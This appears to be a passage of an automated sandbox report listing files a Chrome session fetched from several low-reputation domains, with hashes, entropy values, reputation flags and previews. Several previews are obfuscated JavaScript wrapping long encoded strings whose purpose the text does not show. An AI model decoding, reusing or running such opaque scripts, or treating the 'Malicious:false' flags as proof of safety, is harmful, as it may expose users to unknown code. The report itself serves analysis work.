                                                                                                                                                          MD5:1981D35BBD195A80CB7E031D80873C13
                                                                                                                                                          SHA1:382F0AB8C43D027A4F99933929022231461863D8
                                                                                                                                                          SHA-256:B98599E45C89EA6DEC465E44CD5DE8BA09EB0382DEEFF76B6D450D1A49CD62DC
                                                                                                                                                          SHA-512:E7968FCCD69A15A659B96B0A2FE5507C469FA5C2E93D889C01594E2EB1C1132E153761CD7B3F514A8380BDCF95BA4FAEBD974FD9AA6B3E5FB8AE83EB27411FA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/iconSvg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQMxRAARw4+WcNo+NJrHigeSNGHcezckHzSYzYoAJ5o6ji40hgUKogObZWe+7QAOWrIzm5+QUksx4HEUaEoAGJeg1KABqHgACz4SH0vQGQyQN1uUHKszQxkU7C4vAEaEwkiKsh4pQRSP0ABIYLMtiAAKKBGpoYQgamI5GuGT+Nj6VwwAA+op4aiBILQshAmDqwXIMEGwxYlH8KB4PAavVksJpyNRqoxpGw8sozVaFAUWxUaLVlpauvewRV6O6G2ZLEN+i92yx2sUIzYKBg0igYEC6rO/hkwUoUGUUAaiMMxjB6qUEUoNzNFukQQoWyUI0oAA9/GY4Cx4bM2Kxfb0vjUbuJiO3xLdbfwYAAlEB4uwAMTQXWwxDihSTsj4pSQCoAagBVAD0AA5KOJMGhSFBSFFqKRfsTBDxJAvKHBlwBFJJb26UQxbFO0BoAFnXhHwUHXMQAnMEaABP4iQgEYJjnP4VJ8PoIDlhAKD2Ka153oSfwkkIIiSG2ahAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1773
                                                                                                                                                          Entropy (8bit):7.299231445360026
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2D1C3J3/+2dl+zEJQBW+zTW8FYzhMGRBF:zo7F52Wl+wiBW+f2KGLF
                                                                                                                                                          MD5:23AB701F12E5E0D76FD704E02C96043A
                                                                                                                                                          SHA1:0E3AB100DECB72F8CE6CD1A11ED69A5262437761
                                                                                                                                                          SHA-256:C02D92076DBC68B2A86882956CBD429FA78A5AD1926C5A744072AB1EFE8E534D
                                                                                                                                                          SHA-512:FCEA6BF76E77A0C2C75E330282191DB4BA2C696F7C90842A57791C88BD0DD15514FD6DDB64CC90E2BC684823193C529DD44CFAB70A5164B64A6257CB16D9B607
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:AA198FFDA6D711E9A120E12A5DE24F52" xmpMM:DocumentID="xmp.did:AA198FFEA6D711E9A120E12A5DE24F52"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AA198FFBA6D711E9A120E12A5DE24F52" stRef:documentID="xmp.did:AA198FFCA6D711E9A120E12A5DE24F52"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?> ......bIDATx.b...g..`b..`./....j...,.*........{O..<.n..7......O.$.I...=}.k..../|x.. ...&_....6....|......^.-!.V1..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1954
                                                                                                                                                          Entropy (8bit):7.417947450666081
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DdOJJ3tCTkIUXggIOZNTrWUdXgxAJ6:zo7F52oCKbzZNTrDky6
                                                                                                                                                          MD5:6B2665EF458F844A9730AED043009E55
                                                                                                                                                          SHA1:B8D449F85E04453AF5BC0C17F0319E0353117C42
                                                                                                                                                          SHA-256:8554074404315773C29A56F0709068144381195CB704C67102645CDFD1E688D6
                                                                                                                                                          SHA-512:45A30E176E3C1038D29B8669376B90DF66342C4D0451B0D9B214710AEC320AF112D3670F81622550BE13B9D901A939FE0A7A5B12A412283766719D739C848891
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A730D25FA6D711E990EFC94F38CB495A" xmpMM:DocumentID="xmp.did:A730D260A6D711E990EFC94F38CB495A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A730D25DA6D711E990EFC94F38CB495A" stRef:documentID="xmp.did:A730D25EA6D711E990EFC94F38CB495A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>[..Y....IDATx.b...g..`b.. .hu..EiN #.W..A..-.<<<.U...+M,S..a.~....."..B._.x......x...)?Z.0F........._L...oy..*...t
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1208
                                                                                                                                                          Entropy (8bit):6.567953586737481
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:t1hmYaWwjx82lY2T3XVAm/4yJ3VcaBGrA+BPT000Tyul:TMYLNn2Dm6J3ZBQBPT0yul
                                                                                                                                                          MD5:763C4D1816E26162D90EB067A825B7C2
                                                                                                                                                          SHA1:4137FEF6D96CC208B347E4E0ED6F9716BE3FBC87
                                                                                                                                                          SHA-256:1D8739627FE6795BB39539E0BF539CA4BA0F583D65DB6CC5917F3F7C5F55D8A6
                                                                                                                                                          SHA-512:7F530C3594755DBB57CA5F4BFAA7FC247A284C28138955C03ED17DC3850030328D9676C8B05C767CF1E5D79DB4BCD34D706479567D551A1CD4FD8BE3D199DE66
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/member/icon_user.png
                                                                                                                                                          Preview:.PNG........IHDR.............V.W....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:0BCA7ED9FFFF11EB98BFD0CCBFBA7F88" xmpMM:DocumentID="xmp.did:0BCA7EDAFFFF11EB98BFD0CCBFBA7F88"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0BCA7ED7FFFF11EB98BFD0CCBFBA7F88" stRef:documentID="xmp.did:0BCA7ED8FFFF11EB98BFD0CCBFBA7F88"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..}....(IDATx.b...?.......#.c ....!S....q/.w#.:.X.r..J...c......}P5....*..c.-T...8..*....p.7PZ.Y...P:..A.P...(.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 300 x 283, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42924
                                                                                                                                                          Entropy (8bit):7.984599902350812
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:PlxFmZ09Adpg5kx1DVps+gPV2Gzd88qLlU7k4ExIBeZRLdTFhdW:Plxd9JGDVpKUGzd8HK7Zg0sRLdTbs
                                                                                                                                                          MD5:89FD61C20C939B0621B8F52B0E0068F1
                                                                                                                                                          SHA1:FD2053ACC89C96463F0DCADF3E608DB5452F9545
                                                                                                                                                          SHA-256:B57D0DB6CA3EEA33EC8FE5ED24AC0AF97CC1B97FBF1DF16CB8FB80CD25B844A8
                                                                                                                                                          SHA-512:3F33EBEA5C5D462BBC5B0CAC507BB859E8C754347292A59362CD99CADB572051A977860364A0A9079A746DA7B0677ADB74C75FCBAAD32F36B21AE8BA68682A24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...,.........W.IR....PLTE...k..U........e.......................hgq......TW\F@;........................spv..................nkq.......|{.xuz......*.....................................{....................w..3&..................gel...........A2(.......@................<Aj................GLx...............ys........g6...................t|....}......dk.Zb..v.|....lt.............l......w._8$.......>...kD1.^KWGAS+.A"....I............xd.!I.S(N<1\^f..........H.cTMOT..^H...sQ>..{/5Xi...n\......37....uZ.iSRS\RX..+c.....qlx.t}......t..(....r`X.L7...U...........*._g.C... +.-.jt..nf.5.....gDFP\d{..X............2{-0@.GM......{@<>|...5......*....o~........k..m...-J..Z..~I..........e2...m...I.r...x..E6.ILOr.+a..moq........?.._.w.{.?.lX!......tRNS.....%`F...e.......:M...GIDATx..?k.@...3NkO..n(.!/.c(\.....4xi9.B(.]JP.P..h...p.;h.o.A_!...=.k.m......LH..<......`8...;...p8x..a....b...g.wp.........;..{4....TE...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2572), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2572
                                                                                                                                                          Entropy (8bit):5.876132692934285
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V8BnMeyfaPf5k/iZc/85/nhc4NvMH4Bqqn8itL8ytLSYdGdLJnbbnjVf:VsBZPf5k/i6/y/zOpqTtLbGf35f
                                                                                                                                                          MD5:824454D1D22644D268DB7385581AE430
                                                                                                                                                          SHA1:FDF04300BF1D1C7D660C2609938603ECE101C9C0
                                                                                                                                                          SHA-256:AAE8ED5995DE75B112C4E5A041297E7041C0B03D103A3BA21B50BCBA99B76391
                                                                                                                                                          SHA-512:3270B790044D714359B5FE8BBD0378B3A720795E74DD47F3A93AED4C8A7E5724B74B5682E77AA1F13C602F02F2CC14A4D3F734A62ADEC7FA2E8DC4DF12F1153F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/logo.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgBYBWAXQBoBvAInwCUwBJagLgDMBXNGAFwEt0mHuRDkoAShockIAARIeAJz69qAbgDyYAFYheAOgAmINnzQgACopQQQingE9Mo6gH1XIJAFkUhjgBsQaioANyh/DhAWAEJ8AF9xNTDFWRQAXihMWhgINmpxcn80zEzaPgsAC3yxLIB6EIBxQnyCpAz9NEx/Ar40yjQoAFso6n8UAHMUYMMoHih2Ll4BTslFEB4ORTRKGEM0C1mKlhQjEygAnn0AYXQFKDRL3bQACRQFcjgQByQWfHI+JAAZQqKGALGoVwq1mG1GiaROxjY538lwAqvx/PpxusAELWYAyRSYVog4AAGQmKBiuEKlJYlDi5CQpMBAHUAGLUpnANjPe6GK7+KAAL2F9OAfEMPCO1GCFRAfHGFR44OojLYQuZgMcgXFkul4MI+HwEAAHnKFUqVdQAMzGs3BGywPiOX5xd3kYbS3w/SgyHgUyYLbj8QQ8STJWQgNLSgFqBFnC76dF8TEAxiDKDYgAiel8IEMxIA/AmkUmU5jsTxczB84YM1mQDioDIAGyEITifTSkCdTgh5adyggfRjSb6BQOQLYahgWBwcbWLiGAC0fEz2OopDS1E2/iyAGoeAf8mrxCxY0hR5SJzqQDO5/BFyhl2uN0Ft7vFPvqAehCXTjLFFrluOYHn0DgIDGKBDFeBQj3BWp10bFcIBgWoxxQWo7GsRR9AgNBxnyE9xDVRkYDWWYC2DJZBAjKAUh4GMKgBEQ0glNBDFBfRAQAaUYAA5NRSlwABBbQiPELJ9FqX8QBPJDOJAU19G0JB8m7eU+0WUNOhAeiUigNIR3lGC7GvSY1FcLF1hKchqEnQJ9EfBcl04t9G3yAAfLzrP9OyHLvZz52fV9kM3ez8iSBjZCKKBbynEcJSlCp/naRyTMtZVyHGNIr3iqsskwg5pSiy4ABJzFNHgABUVDgTB+
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (26796), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26796
                                                                                                                                                          Entropy (8bit):5.998523514960875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:nbRsIZajhh7Oe2ICXpk46Zx4l80GvEbLzG/+N7wp:nbROfO5wx4Vmnp
                                                                                                                                                          MD5:B5D179C7DBB0D667F93CC2F5BEC8C129
                                                                                                                                                          SHA1:EADC0D1B43D69BDB68B27930BA8BC3DA9736F505
                                                                                                                                                          SHA-256:9BFDE0F7A80D351BCDC7A9F11A08FA79DA12EB7B687C27807708D4A868DC5375
                                                                                                                                                          SHA-512:28E904E64D96CB4AA2A12EC708D8BBB97CBD12E9139562430C10247B3C94D375527DE35C1E2E5B4AA4EDBCED2A0EF426F7C1FDF69171DCEA4C612B2E1B3CFAA2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:u9mEPUGiHlEmTCgtFvEn3uYAvMKEaosHYrMuFiVlt0KDLvhlsxHmDiv1mLy2c8oS+eM6syq5k9AO29LQc1S2BLYwGIu5XQ2w440KGJzFJ9C9UTEI58vF5mRTycaJWLkbcb0HVOtKza9nE4nrLFnmo4GuqazxoGsdgFejm+jKn/tOwjodmm1oP2xl76FYzDrE/3xvsbQ4xEA7slAaNHrgAyC8BJoG4qpRlIKBK4W961AfQgA6uAtPL0Y+O6045KPKur+uOD/6gMaDAzxVzZ6o2pLeZFU1SZ5/KhfAOFea5oNV2XtOYbVE+P57ZZDjxmwk8UQ9nffiOI8VY3sWWFNxUvX2aY+2h4xhGQ8ku2P/o96Y0Im4KTX37ti+8J3H4oj162WB1hMfXJUA8BuABo3lshuOSADgPtD/89s3XCk69+mPhNMUSYtc1e62Wqc/QkKdGw99UneI90erYCyD2Hn/ACISZlTL8BSNTsx7BcFy67KIiK+Iaq5hP195wunWPa/PH1wYUCxvnMolktfDD3oX5R0Lp8cVkQLBQN5g2pMlSYSkMEyiuV2GxkSL769kLT0WtVIrO/PHfsp3LbaDyrEa5S20tHeCP7HoB+7O5HpQkLakb4oT5Cnv8fiaXGjPRxwNunXBUC3skW0M/g1mB0ijVD2O7FqvtgboJkfLJmLi2XrUwkGEVh2mLIIc/cEFD31Kl2yb/2/P03i4WfKLD2YKmbo98zb2/L4K+lhH5y4r0+R0WLJr2lkz6WagRoLaq1rFyKHmZFdb0DdrlhCSDiSVb5s/zQvJtezzvxKZcN8AUNSsTbGzN1y0nBgAiUe6Fb4EXd5D6eYpjPhKPmf88uig8d6o4pGN+JlmAVCqYSY68SbunXq5UDPcz6rzzTs5iyTZwLaW3Dl2ajnN6sSqaPFaWbrqkoSSR3bxMWgMS3rwYKWsOjQNGdmF7jGGPw4wr0EUhnclGQxLT7BGTSfywshR3eUdnatJpabTe33JqTgd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1091
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):698
                                                                                                                                                          Entropy (8bit):7.691593796397796
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Xyu6WcCGBYj0I5lMXz2lx5XPYMB+RC+9fgOWYAuoRact6liYe1ZADA:XyuNz+Yj0Iq2v5Y/C+nKuoQctXMDA
                                                                                                                                                          MD5:C04D3D132DFFB265CC02B82F7E6F0D28
                                                                                                                                                          SHA1:C946FCAECBF25B126067EA24DD039D4F50341ADD
                                                                                                                                                          SHA-256:F39FCDA4216C4984221FCE3796DE429A8B04804F72FC83611AB6A1CFA65FBD4E
                                                                                                                                                          SHA-512:12FF86632722ACAC68EBA4A00ABE39DF10A6146CDBA147F0A295C3987654C539D266CBAD3AF30449EE8F89E527E8F8A7AA41DF8C43C5C07390F6A24F6531DE8E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........|..o.0.....Q.M..6].mE..j...4....^.'u...v..G..$........?........di.8`)...>.}.rf..>4......0..0).p..k...\..V.t.:.....#...k4...e&.NFxP.. |xT..T..PQ.Sa0.|..,.>...Q....4..Rvo..9.QS..5.@..1E..z....=..y.R.<Oz.45.R:.l.^+-/j.IJ=c..T..t.){..#2..X..W...*.....K@.v.[..M.i.P*..n^..3`"..tZ....*i.XbJ.=....`{.T..SBn;..R..~..F=.I5..~HHX...u...>*m..d.Lt......o...*..........F.....-.Q>.T......5.C....l..K......."...~.kC......D.....w.<....4..U..2b...........M.Z_...~.$R.\.h.{...y....y....K.....W._.>....m.q...{..L.v.........`.[..k^.....1.V.y.J....yf..'h...H....0....AF...J.}.T.4..a...L...4..U3.........v....Wk..z.~n...'.....?G......W..7.F......F..H.....*..2E.....[..........C...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2224), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2224
                                                                                                                                                          Entropy (8bit):5.880705464458879
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VJt52jA7hovmfxsEg3tsOwCZ1F3s8LUDS55kO:VJH2youy9tsSbF225qO
                                                                                                                                                          MD5:8D6747A70EE11B34D79D7A53505F834A
                                                                                                                                                          SHA1:B30DEE55EBEBB171A124BE40548F4227ED8A3D39
                                                                                                                                                          SHA-256:DE36854F1519DAF54CF280D8C391C7ADB6F2D7E7F76387DAF67D597726500E33
                                                                                                                                                          SHA-512:A7FF886E68AE89CEE86B66504F28F657FAFE1CD13E1BE9292894DD73295C6551A911810C37B158ABAEB2C2ABDC10C62F85E01F4A4C29772D3A09070CB3EC7197
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/383/menu.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgE58BdAGgG8ATATwgAsAuAMwFc0YAXAS3U07JoyIAJQUARKyQgABEk4Anbl3EBuAPJgAViC4A6KiGbc0IAAoKUEEAs41MQ8QH0nIJAFkUVVgBsQ4ygA3KB9WEEYAQnwAXxFVYIUZKABeEExxfBgIZnERMm5kihgUAFsIdBA0TiRGChLK1gBlVjAWdi5eNEwxBRBOVgU0GRA9NNwAZkmRPU56SswRsBMqB18fMnEUADUARwANXJFo6LIqKE4oNo4ePh6+gbQKNChA2uOT4rLWThAqWuf6lcOrcKL1+oMkgYjFBfJw9ABVHg+PT1NCsABKKG+IAAclB6vx6NwkHoACSWbF6AGiY5keqzLw1CgAcz67igAA8gTcupw7uChvhkslZsSqS8UZyAPz4RicAA+8tFJOegUlHJOxIAwj5lHBuZ1+GIEjI0MlSfwZlAFKy+Xpzop0jAfFAkEhcqo0AAyL1oPTLEAc9TMdIAIQAkjiACJOXI+zAW8R6dwAURx8KcaYAKin0blsKRFYnk2mM1qADLhrUAaXzpClFoA5NhuFQAHrJcRIFruBqxkiMQLE7hgPyN6ZIXWGeFYABM+HwIkYFrhFxtfWmo4G3SOZFtOqgAC9Dwa+HyKNwQ3DW/GInDdfJFULhffiffKszZorxKn004K1WtYRC+RIqhKzpHoeIgiGCDwyHCEHHj6AD0mARtG8rouo8I5uiIjITMbicJaiGHjMKAztYChaq6aTQVK4jiIwUBQswMI+HCobLHopFcWgKzXlQu62s0YDhn8bDXIa56wRCnBSnCvQQC6MBpMhAA6yHIcyGyxkujEnLaAASvTMKevL8nBLGGGxsJ6HxVB6LqaBwA5lr0KZRwfL05y/OZ3QUCanAiqBgjJMAywoMAeiNNWkaqGk4i4AAglozK5OkejIeIADUaA5eIyEBhyehaO60yzPMknAl0aDGtawzJH
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1774
                                                                                                                                                          Entropy (8bit):7.832274420418644
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Ri5ZCs2ChdBkioCTxeBFcTlU1L2gGZm1fXR3XQVLeILGCmT43Sy7NE:0jSW2ioke1QQ1JnQVqILsvy7NE
                                                                                                                                                          MD5:759673EB2C56D930FEEE103FCCA193D4
                                                                                                                                                          SHA1:33B73CC13FCB4C498F46CDC043268BEF553D4365
                                                                                                                                                          SHA-256:526F1DDC7A3206BE8297701549F9EFCFB1F9C251B3717B6BE234044B8C0CD2F0
                                                                                                                                                          SHA-512:C02E46553087A0B09A6DD2A6F1A1D5DD74DE0256E18C07D26FB94229330C60B2F096AF9B9F46B7E8B1795D12414540764F617BA01DDDBBAEB9B28C48586E7FAA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_bg-dx.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...+....*)...J..-..N..5..I]..;...D.....4..D..;L...z9..EP..<....5..E..*..A....o..lK..Z.....2...p..S..G..-..6..0....\4....D..6)...<...-..(..4...c6...$../.........?(..F....h..P.(..0.1..{.....................:"..}.\%...l........A.......my....|.s<.b1.t/.U&......u....+1.<2..R./".........h)d..G..>.;.g8.x2.k*.k....=}........BD....:c.j|....lQ......0K......|Wi.`RX_.f[.X..Wx_T.M.I.H.F.E.fEJ@<.;216.Z5.W5.3.v(P3#..n....U..}..n.....ax.&n.?W......$a....j.y`....Wq.Oc........DX..:........0.@b}p.w.yv..s.n.n.mvrh..f.a..X.W.P.O.TH.`@.h?..>.c<.9.6.5.4.....{.....H.....o.....Ds.(A.z.....TP.Io.V@..zdfxQ&u..l.pb..`..[.5S.M.8.i7.P".Z....D!........................D.h7.:}|.qod.c..^.A].[;BR2{P!7Ka.E.{@m=;M.82Y4.N...Z....BtRNS.......k.......G.......................[XT11...............siQNI.......aIDAT(.b..[.MkE6 P2W.`@.:..,......<xOP..M.."wWsJo.jfOh.=A!1M$I&v..}i[..>....... .7..\.../yme.....;......P..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2200), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2200
                                                                                                                                                          Entropy (8bit):5.880542892176317
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VEu8ixe/SZNytKMFmr4GTMfMOGRJ4Y+y2eYWsAQBDjuHybwAYJED:VEu/e/gNy58rrofMOomy6WsAmDjuEhY8
                                                                                                                                                          MD5:9A3C001866C07AA1C23516AF9822A940
                                                                                                                                                          SHA1:B0EF77C1BD097F79B051544DA98E269C21BB48F0
                                                                                                                                                          SHA-256:299B2F83D2397A0D1554CFDC62F96FAB91D301A9B0242A67B872B75C12DA728B
                                                                                                                                                          SHA-512:2BD4E9379D7580B5354C89A7E79F770F4807CCE10552B2C15716D92BC7A6D2A85861F3A9342D318DF9526D8A2DB546DBE42DDF27DECCE22DA12F6C7FCEC2A62C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/sound.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDYBWAXQBoBvAMwEkAnAdgC5qBXNGAFwEt1Mu5EAEpKAX3IBHAHLSAHqw7c+aAUPJpRAIjZIQAAiRd6PbloDcAeTAArENwB0AExDUeaEAAV6KCCHpcAJ6YIORaAPrhIEgAsihObAA2IFpUAG5QiWwgzACEAAxiwuYZ9Po8ALyqWgAiTgAcwFrC5ChVDqo8LWxVmFr5MBDUzeT0vVrSAJpyliNIFZgomMKY4uTWdtyY9A4AtlAQAOIgXFz+SCvYWrtsZ6laqBxOAGKJUADmWqTCLUsraxt7FxtnsDjFblBeOgLqs9FwAMooJ6vD7MLTwgCiABVwvDLABVaQ1cLPAAyAEFDloilQIG9AopOFDVKJSvouBUACR9ADEXAAFiAALRQNhOPjNBzvE6YfLFLgAMgVXAcdKgwWEEiMvkZyn4rKgZQ53K0fMFIrFEuEUplcvMiuVqtFemWEmlXAAQj5gHp6N5XDwFOwmSpljQUPRMGyOVddigAF73XZIe4oe6gMBwHhcL5CCr5cwgAA8KuSaHeAsLAGoq8IeNQBPyeEgbVwABI8JwuNDeXz+ILSKC7EACbAgb7ufROFAwNjDtBcYT0E5sehodlj0jmZdcVfrtBJRJuk4drsgHs+PwBQKD4e65kCUQ7vfsgD8XCrWlP3a0aKbZ7QalyHdAA1ZseDAHhEmzQIMTSc8uHvUNF0oZ81wEAAfDCtGaT80nAyDoKCGB+SgcsUgkdxsyQ/VKGjCoBWbcxuWnWd50XBx+C0GBoPge4ACpUmDPVVBESgVSQfkUGAclLRQJVchVG4ziVFU1Q1IoSkNfQQAYpsW3dL1pN9f03DkZYND05tyEqRiDJOMCkAgqCYLghCQmKVi5wQhwoC7NyF1JZszg8SMeHIYSH1ELz2OwNBW2/c9eyvAchxHERSFfeLtSwYRmDhLEeGHJFgXi9TyGIfI5QkXJcE1YCT2
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10381
                                                                                                                                                          Entropy (8bit):7.961677163246217
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wayevD7qnQtT568cWT5V32KMTYV80N28yoDqrN:I50wlGfqnQtT568xiKH8loGrN
                                                                                                                                                          MD5:D52EA92CA7AA5D073B53FC366142A740
